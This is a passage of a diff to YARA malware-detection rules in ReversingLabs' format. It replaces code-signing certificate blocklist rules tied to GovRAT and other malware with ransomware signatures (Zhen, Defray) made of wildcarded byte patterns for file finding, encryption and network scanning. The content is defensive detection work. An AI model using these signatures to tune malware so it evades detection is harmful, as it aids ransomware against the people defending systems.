$setup_env = { + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C + 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 + 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08 + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? DE ?? 2A + } + $encrypt_files = { + 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ?? + ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08 + 09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A + } + $find_files = { + 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B + 2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ?? + ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? + ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B + 07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? + 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? + DE ?? 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures[i].serial=="65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing GovRAT malware." + description = "Yara rule that detects Zhen ransomware." author = "ReversingLabs" - id = "45c37c98-1006-51e4-8832-b8e5c9fba416" - date = "2023-11-08" - modified = "2023-11-08" + id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd" + date = "2021-04-28" + modified = "2021-04-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1544-L1560" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Zhen" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Marc Chapon" and pe.signatures[i].serial=="12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing GovRAT malware." - author = "ReversingLabs" - id = "8759a40a-648e-548e-a519-bedc812aefe4" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1562-L1580" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15 + ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ?? + ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D + 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 + E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D + } + $find_files_p2 = { + 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 + ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 + ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55 + ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B + 4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91 + ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D + 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? + ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? + 5F 5E 5B 8B E5 5D C2 + } + $encrypt_files_p1 = { + 55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ?? + 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 + 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B + 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B + 02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 + 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45 + ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51 + } + $encrypt_files_p2 = { + 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ?? + ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D + ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? + EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52 + FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 + ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? + FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D + ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 + ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B + 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 + } + $scan_network_p1 = { + 55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 + FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B + 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? + 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF + 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D + 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D + 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D + 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? + 8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 + 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF + } + $scan_network_p2 = { + 15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF + 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? + ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? + ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 + 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B + 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9 + ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? + ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B + 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA + ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? + ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? + 33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B + 55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? + ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ?? + C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + } + $scan_network_p3 = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? + ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? + ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 + ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 + ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52 + FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89 + 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 + } + $scan_network_p4 = { + 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 + 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51 + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? + 51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D + 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? + 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ?? + ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ?? + ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D + ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89 + 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMO-K Limited Liability Company" and (pe.signatures[i].serial=="00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures[i].serial=="87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56") and 1404172799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($scan_network_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Defray ransomware." author = "ReversingLabs" - id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b" - date = "2023-11-08" - modified = "2023-11-08" + id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1582-L1598" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Defray" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Tony Yeh" and pe.signatures[i].serial=="08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 1404172799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "0b289c4e-c564-5513-a1a5-42e8551c6218" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1600-L1616" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 + F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 